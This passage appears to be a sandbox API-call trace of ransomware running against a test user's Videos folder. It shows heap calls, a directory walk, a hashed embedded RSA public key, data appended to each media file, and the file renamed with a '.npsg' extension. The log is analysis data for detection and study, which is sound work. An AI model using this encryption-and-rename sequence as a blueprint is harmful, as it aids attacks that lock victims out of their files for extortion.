RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\") returned="NRaXHt\\" [0239.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0239.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0239.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.458] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.459] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.459] PathFindFileNameW (pszPath="") returned="" [0239.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9fb8b0, ftCreationTime.dwHighDateTime=0x1d5bcbd, ftLastAccessTime.dwLowDateTime=0xcf4314a0, ftLastAccessTime.dwHighDateTime=0x1d5bd9e, ftLastWriteTime.dwLowDateTime=0xcf4314a0, ftLastWriteTime.dwHighDateTime=0x1d5bd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.462] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9fb8b0, ftCreationTime.dwHighDateTime=0x1d5bcbd, ftLastAccessTime.dwLowDateTime=0xcf4314a0, ftLastAccessTime.dwHighDateTime=0x1d5bd9e, ftLastWriteTime.dwLowDateTime=0xcf4314a0, ftLastWriteTime.dwHighDateTime=0x1d5bd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.462] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60f3c0, ftCreationTime.dwHighDateTime=0x1d5c571, ftLastAccessTime.dwLowDateTime=0xa5585ea0, ftLastAccessTime.dwHighDateTime=0x1d5bbe3, ftLastWriteTime.dwLowDateTime=0xa5585ea0, ftLastWriteTime.dwHighDateTime=0x1d5bbe3, nFileSizeHigh=0x0, nFileSizeLow=0x6ca9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3UbzXO.avi", cAlternateFileName="")) returned 1 [0239.462] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\3UbzXO.avi") returned=".avi" [0239.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\3UbzXO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\3ubzxo.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.463] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=27817) returned 1 [0239.463] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.466] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6c83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.466] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.468] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x6ca9, lpOverlapped=0x0) returned 1 [0239.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.469] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.470] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.471] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.471] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.471] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.471] GetLastError () returned 0x0 [0239.471] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.471] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.471] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.471] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.471] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.471] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.472] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6ca9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.472] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.472] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.472] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.472] CloseHandle (hObject=0x644) returned 1 [0239.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b89cd0 [0239.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.474] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\3UbzXO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\3ubzxo.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\3UbzXO.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\3ubzxo.avi.npsg")) returned 1 [0239.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.475] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.476] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95599910, ftCreationTime.dwHighDateTime=0x1d5bc6a, ftLastAccessTime.dwLowDateTime=0xe2952150, ftLastAccessTime.dwHighDateTime=0x1d5c1a0, ftLastWriteTime.dwLowDateTime=0xe2952150, ftLastWriteTime.dwHighDateTime=0x1d5c1a0, nFileSizeHigh=0x0, nFileSizeLow=0x1139f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A84B30ap-3imXgf.flv", cAlternateFileName="A84B30~1.FLV")) returned 1 [0239.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.477] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\A84B30ap-3imXgf.flv") returned=".flv" [0239.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\A84B30ap-3imXgf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\a84b30ap-3imxgf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.478] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=70559) returned 1 [0239.478] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.481] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x11379, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.481] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.483] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.483] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1139f, lpOverlapped=0x0) returned 1 [0239.484] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.484] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.484] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.484] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.485] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.485] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.485] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.485] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.485] GetLastError () returned 0x0 [0239.486] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.486] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.486] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.486] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.486] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x113a0) returned 0x3b95d50 [0239.486] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b869d8 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d90 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86a20 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d30 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e20 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dd8 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.487] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e20 | out: hHeap=0x620000) returned 1 [0239.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e20 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dd8 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88dc0 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e20 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.489] GetCurrentThreadId () returned 0x5b4 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b885a8 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, 